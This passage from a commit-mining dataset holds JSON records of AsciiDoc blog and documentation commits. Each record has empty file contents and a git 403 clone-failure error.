GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wbowling\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,lzo\/elasticsearch-1,MisterAndersen\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,mgalushka\/elasticsearch,areek\/elasticsearch,sc0ttkclark\/elasticsearch,ricardocerq\/elasticsearch,kalburgimanjunath\/elasticsearch,diendt\/elasticsearch,s1monw\/elasticsearch,cnfire\/elasticsearch-1,wbowling\/elasticsearch,tahaemin\/elasticsearch,mmaracic\/elasticsearch,tkssharma\/elasticsearch,vroyer\/elasticassandra,hydro2k\/elasticsearch,lks21c\/elasticsearch,dongjoon-hyun\/elasticsearch,rhoml\/elasticsearch,Collaborne\/elasticsearch,apepper\/elasticsearch,ouyangkongtong\/elasticsearch,strapdata\/elassandra-test,wenpos\/elasticsearch,polyfractal\/elasticsearch,ckclark\/elasticsearch,adrianbk\/elasticsearch,rajanm\/elasticsearch,iacdingping\/elasticsearch,kalimatas\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mortonsykes\/elasticsearch,polyfractal\/elasticsearch,ZTE-PaaS\/elasticsearch,mikemccand\/elasticsearch,zkidkid\/elasticsearch,18098924759\/elasticsearch,KimTaehee\/elasticsearch,huanzhong\/elasticsearch,areek\/elasticsearch,yynil\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,ImpressTV\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,pranavraman\/elasticsearch,HonzaKral\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,bestwpw\/elasticsearch,gfyoung\/elasticsearch,ckclark\/elasticsearch,mnylen\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,andrejserafim\/elasticsearch,hafkensite\/elasticsearch,PhaedrusTheGreek\/elasticsearch,queirozfcom\/elasticsearch,StefanGor\/elasticsearch,lmtwga\/elasticsearch,mikemccand\/elasticsearch,Charlesdong\/elasticsearch,glefloch\/elasticsearch,Brijeshrpatel9\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,huanzhong\/elasticsearch,iamjakob\/elasticsearch,clintongormley\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,elancom\/elasticsearch,wuranbo\/elasticsearch,ImpressTV\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,iacdingping\/elasticsearch,queirozfcom\/elasticsearch,weipinghe\/elasticsearch,kaneshin\/elasticsearch,mm0\/elasticsearch,schonfeld\/elasticsearch,Charlesdong\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra5-rc,sc0ttkclark\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,bestwpw\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,nrkkalyan\/elasticsearch,Siddartha07\/elasticsearch,vietlq\/elasticsearch,cnfire\/elasticsearch-1,bawse\/elasticsearch,djschny\/elasticsearch,sc0ttkclark\/elasticsearch,andrestc\/elasticsearch,jchampion\/elasticsearch,nknize\/elasticsearch,ricardocerq\/elasticsearch,camilojd\/elasticsearch,slavau\/elasticsearch,cnfire\/elasticsearch-1,kingaj\/elasticsearch,LeoYao\/elasticsearch,sdauletau\/elasticsearch,areek\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MetSystem\/elasticsearch,apepper\/elasticsearch,gmarz\/elasticsearch,MetSystem\/elasticsearch,strapdata\/elassandra5-rc,Ansh90\/elasticsearch,mapr\/elasticsearch,jprante\/elasticsearch,andrejserafim\/elasticsearch,Ansh90\/elasticsearch,socialrank\/elasticsearch,jeteve\/elasticsearch,rajanm\/elasticsearch,MjAbuz\/elasticsearch,obourgain\/elasticsearch,rmuir\/elasticsearch,i-am-Nathan\/elasticsearch,onegambler\/elasticsearch,kaneshin\/elasticsearch,Collaborne\/elasticsearch,girirajsharma\/elasticsearch,markharwood\/elasticsearch,kunallimaye\/elasticsearch,mohit\/elasticsearch,sdauletau\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,F0lha\/elasticsearch,onegambler\/elasticsearch,coding0011\/elasticsearch,knight1128\/elasticsearch,wuranbo\/elasticsearch,iacdingping\/elasticsearch,pablocastro\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,tahaemin\/elasticsearch,dpursehouse\/elasticsearch,KimTaehee\/elasticsearch,GlenRSmith\/elasticsearch,liweinan0423\/elasticsearch,lks21c\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sneivandt\/elasticsearch,dpursehouse\/elasticsearch,JervyShi\/elasticsearch,Collaborne\/elasticsearch,avikurapati\/elasticsearch,YosuaMichael\/elasticsearch,lmtwga\/elasticsearch,nellicus\/elasticsearch,njlawton\/elasticsearch,vroyer\/elasticassandra,pablocastro\/elasticsearch,IanvsPoplicola\/elasticsearch,achow\/elasticsearch,ESamir\/elasticsearch,yongminxia\/elasticsearch,areek\/elasticsearch,jango2015\/elasticsearch,winstonewert\/elasticsearch,hydro2k\/elasticsearch,s1monw\/elasticsearch,wittyameta\/elasticsearch,C-Bish\/elasticsearch,lzo\/elasticsearch-1,fforbeck\/elasticsearch,petabytedata\/elasticsearch,sneivandt\/elasticsearch,rhoml\/elasticsearch,s1monw\/elasticsearch,kunallimaye\/elasticsearch,kaneshin\/elasticsearch,xingguang2013\/elasticsearch,ulkas\/elasticsearch,achow\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,clintongormley\/elasticsearch,hafkensite\/elasticsearch,wuranbo\/elasticsearch,yongminxia\/elasticsearch,karthikjaps\/elasticsearch,artnowo\/elasticsearch,AndreKR\/elasticsearch,jprante\/elasticsearch,camilojd\/elasticsearch,obourgain\/elasticsearch,rhoml\/elasticsearch,glefloch\/elasticsearch,mbrukman\/elasticsearch,Siddartha07\/elasticsearch,mm0\/elasticsearch,onegambler\/elasticsearch,gmarz\/elasticsearch,beiske\/elasticsearch,vietlq\/elasticsearch,knight1128\/elasticsearch,drewr\/elasticsearch,karthikjaps\/elasticsearch,18098924759\/elasticsearch,nilabhsagar\/elasticsearch,masterweb121\/elasticsearch,Uiho\/elasticsearch,girirajsharma\/elasticsearch,vietlq\/elasticsearch,ulkas\/elasticsearch,achow\/elasticsearch,bawse\/elasticsearch,truemped\/elasticsearch,MaineC\/elasticsearch,caengcjd\/elasticsearch,xingguang2013\/elasticsearch,masaruh\/elasticsearch,bestwpw\/elasticsearch,masterweb121\/elasticsearch,nezirus\/elasticsearch,franklanganke\/elasticsearch,rento19962\/elasticsearch,himanshuag\/elasticsearch,ouyangkongtong\/elasticsearch,shreejay\/elasticsearch,btiernay\/elasticsearch,jpountz\/elasticsearch,episerver\/elasticsearch,sreeramjayan\/elasticsearch,himanshuag\/elasticsearch,elasticdog\/elasticsearch,PhaedrusTheGreek\/elasticsearch,IanvsPoplicola\/elasticsearch,YosuaMichael\/elasticsearch,sc0ttkclark\/elasticsearch,Helen-Zhao\/elasticsearch,djschny\/elasticsearch,AndreKR\/elasticsearch,wittyameta\/elasticsearch,wimvds\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lzo\/elasticsearch-1,pozhidaevak\/elasticsearch,slavau\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,naveenhooda2000\/elasticsearch,beiske\/elasticsearch,slavau\/elasticsearch,jimczi\/elasticsearch,tkssharma\/elasticsearch,nellicus\/elasticsearch,LeoYao\/elasticsearch,kaneshin\/elasticsearch,rento19962\/elasticsearch,tebriel\/elasticsearch,Charlesdong\/elasticsearch,sreeramjayan\/elasticsearch,jpountz\/elasticsearch,girirajsharma\/elasticsearch,davidvgalbraith\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,diendt\/elasticsearch,nrkkalyan\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,sposam\/elasticsearch,kalburgimanjunath\/elasticsearch,vietlq\/elasticsearch,djschny\/elasticsearch,brandonkearby\/elasticsearch,bestwpw\/elasticsearch,spiegela\/elasticsearch,onegambler\/elasticsearch,infusionsoft\/elasticsearch,sreeramjayan\/elasticsearch,Uiho\/elasticsearch,nrkkalyan\/elasticsearch,jango2015\/elasticsearch,ivansun1010\/elasticsearch,episerver\/elasticsearch,ulkas\/elasticsearch,mcku\/elasticsearch,ckclark\/elasticsearch,jango2015\/elasticsearch,masterweb121\/elasticsearch,pritishppai\/elasticsearch,lzo\/elasticsearch-1,masterweb121\/elasticsearch,rento19962\/elasticsearch,slavau\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,njlawton\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrestc\/elasticsearch,ImpressTV\/elasticsearch,mbrukman\/elasticsearch,mmaracic\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra-test,Brijeshrpatel9\/elasticsearch,markwalkom\/elasticsearch,franklanganke\/elasticsearch,weipinghe\/elasticsearch,camilojd\/elasticsearch,adrianbk\/elasticsearch,jchampion\/elasticsearch,Uiho\/elasticsearch,ricardocerq\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nellicus\/elasticsearch,palecur\/elasticsearch,schonfeld\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,MichaelLiZhou\/elasticsearch,F0lha\/elasticsearch,mmaracic\/elasticsearch,elasticdog\/elasticsearch,socialrank\/elasticsearch,yynil\/elasticsearch,huanzhong\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,vroyer\/elassandra,ZTE-PaaS\/elasticsearch,djschny\/elasticsearch,davidvgalbraith\/elasticsearch,nrkkalyan\/elasticsearch,markharwood\/elasticsearch,queirozfcom\/elasticsearch,sdauletau\/elasticsearch,JSCooke\/elasticsearch","old_file":"docs\/reference\/modules\/cluster\/disk_allocator.asciidoc","new_file":"docs\/reference\/modules\/cluster\/disk_allocator.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7b19087d1833b0980ca2917d70b815bce5ba5df","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d52d63063decb24d0683fdff90f0dca2bcd22f7","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3f1bf55b1e7cd7b00b9c2526753fd7f6095c185","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c65473213e0848341caf07ee9c721b4f017a69e","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9165d6a0c1ae11761b4978a8495fe3c7441cbef8","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b688ab34e8724e1424b4a16fe3bbd19ec37d25e3","subject":"y2b create post iPad 3 Review \\\/ Rant (New iPad Review \\\/ 3rd Gen \\\/ 2012)","message":"y2b create post iPad 3 Review \\\/ Rant (New iPad Review \\\/ 3rd Gen \\\/ 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-17-iPad-3-Review--Rant-New-iPad-Review--3rd-Gen--2012.adoc","new_file":"_posts\/2012-03-17-iPad-3-Review--Rant-New-iPad-Review--3rd-Gen--2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57b12c641aed12cd82bf2505864949dccd08f399","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63ef71ed0babb7b7a6d06881950fee42c190a3b0","subject":"Update 2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","message":"Update 2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","new_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5db2142af3d70c85f90f438542bd207e4b3d98b6","subject":"Update 2016-04-30-hibernate-native-json.adoc","message":"Update 2016-04-30-hibernate-native-json.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-04-30-hibernate-native-json.adoc","new_file":"_posts\/2016-04-30-hibernate-native-json.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68790f4e05e39d7322652b94e0371acf0cc443e3","subject":"Update 2018-02-05-Think-About-Documents.adoc","message":"Update 2018-02-05-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7567f84c986ec1b0e03d5ff8664fc958ecccd8e6","subject":"Update 2016-11-10-091800-Thursday-Morning.adoc","message":"Update 2016-11-10-091800-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d0461ef3db8612947171112b90645ca7d87d6a4","subject":"Update 2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","message":"Update 2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","new_file":"_posts\/2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6baf98931080d9ebba3ddad45a8d2071c27afd98","subject":"Design documentation on resilience","message":"Design documentation on resilience\n","repos":"cschanck\/ehcache3,rkavanap\/ehcache3,AbfrmBlr\/ehcache3,GaryWKeim\/ehcache3,henri-tremblay\/ehcache3,AbfrmBlr\/ehcache3,jhouserizer\/ehcache3,ehcache\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,aurbroszniowski\/ehcache3,chrisdennis\/ehcache3,lorban\/ehcache3,lorban\/ehcache3,jhouserizer\/ehcache3,ljacomet\/ehcache3,alexsnaps\/ehcache3,ehcache\/ehcache3,ljacomet\/ehcache3,albinsuresh\/ehcache3,albinsuresh\/ehcache3,rkavanap\/ehcache3,chrisdennis\/ehcache3,GaryWKeim\/ehcache3,cschanck\/ehcache3,cljohnso\/ehcache3","old_file":"docs\/src\/docs\/asciidoc\/developer\/design.resilience.adoc","new_file":"docs\/src\/docs\/asciidoc\/developer\/design.resilience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e31ee77351fb43499537732185a40b160faa6f9","subject":"y2b create post It Has Double The Battery of iPhone X","message":"y2b create post It Has Double The Battery of iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-28-It%20Has%20Double%20The%20Battery%20of%20iPhone%20X.adoc","new_file":"_posts\/2018-01-28-It%20Has%20Double%20The%20Battery%20of%20iPhone%20X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2199e0bde87446e3db588018e0a970843b208cb","subject":"y2b create post Top 5 Tech Under $200","message":"y2b create post Top 5 Tech Under $200","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-28-Top-5-Tech-Under-200.adoc","new_file":"_posts\/2014-11-28-Top-5-Tech-Under-200.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2f4356485d9329124f808e3ef96aef9bb25a33f","subject":"One class only","message":"One class only\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/421.adoc","new_file":"Objects & interfaces\/421.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b58bd6b54877d5206c01167c93e683112b7785a","subject":"Update 2015-02-09-Test.adoc","message":"Update 2015-02-09-Test.adoc","repos":"HiDAl\/hidal.github.io,HiDAl\/hidal.github.io,HiDAl\/hidal.github.io,HiDAl\/hidal.github.io","old_file":"_posts\/2015-02-09-Test.adoc","new_file":"_posts\/2015-02-09-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HiDAl\/hidal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87c742980d15a33ddde20a936a0e170f06e0b02f","subject":"Update 2015-07-02-Perl.adoc","message":"Update 2015-07-02-Perl.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-07-02-Perl.adoc","new_file":"_posts\/2015-07-02-Perl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"997422ede75dc50f07ecfa4ba036d4e59ac00291","subject":"Update 2016-03-18-Test.adoc","message":"Update 2016-03-18-Test.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Test.adoc","new_file":"_posts\/2016-03-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1475f3f79bfc967ca6fabaf79cfc9aaf4d0f39de","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2016c1d4bd074a5edb003fef153db89e4be55cf","subject":"Update 2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","message":"Update 2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","new_file":"_posts\/2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556204a6774f61a9946a23547c927e237d53308a","subject":"Update 2016-11-24-Co-working-co-living-remote-nomad.adoc","message":"Update 2016-11-24-Co-working-co-living-remote-nomad.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2016-11-24-Co-working-co-living-remote-nomad.adoc","new_file":"_posts\/2016-11-24-Co-working-co-living-remote-nomad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0c0901acba5f3b8fadb39ca0abc781d05b57817","subject":"Delete the file at '_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc'","message":"Delete the file at '_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc'","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f3fd032d1b89be03b19dbb6242a431fc5884811","subject":"y2b create post OtterBox Defender for iPhone 4S Unboxing \\u0026 Review","message":"y2b create post OtterBox Defender for iPhone 4S Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-25-OtterBox-Defender-for-iPhone-4S-Unboxing-u0026-Review.adoc","new_file":"_posts\/2012-01-25-OtterBox-Defender-for-iPhone-4S-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28086d728996c1e1045db502a837b28644530574","subject":"Update 2017-09-18-Adding-custom-domain-to-hubpress.adoc","message":"Update 2017-09-18-Adding-custom-domain-to-hubpress.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc","new_file":"_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e40d5272e51ffb91a8afd8485fddd88d21b4acfe","subject":"Update 2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","message":"Update 2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","new_file":"_posts\/2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be4ac9b2748f4b921c0e4038328f96bb8d025464","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a675aae8a0691e621cfadd8f1ff998ce36d0e551","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9593b9d0b6d5419b65cd3f5607df6f72e2365a45","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I.adoc","message":"Update 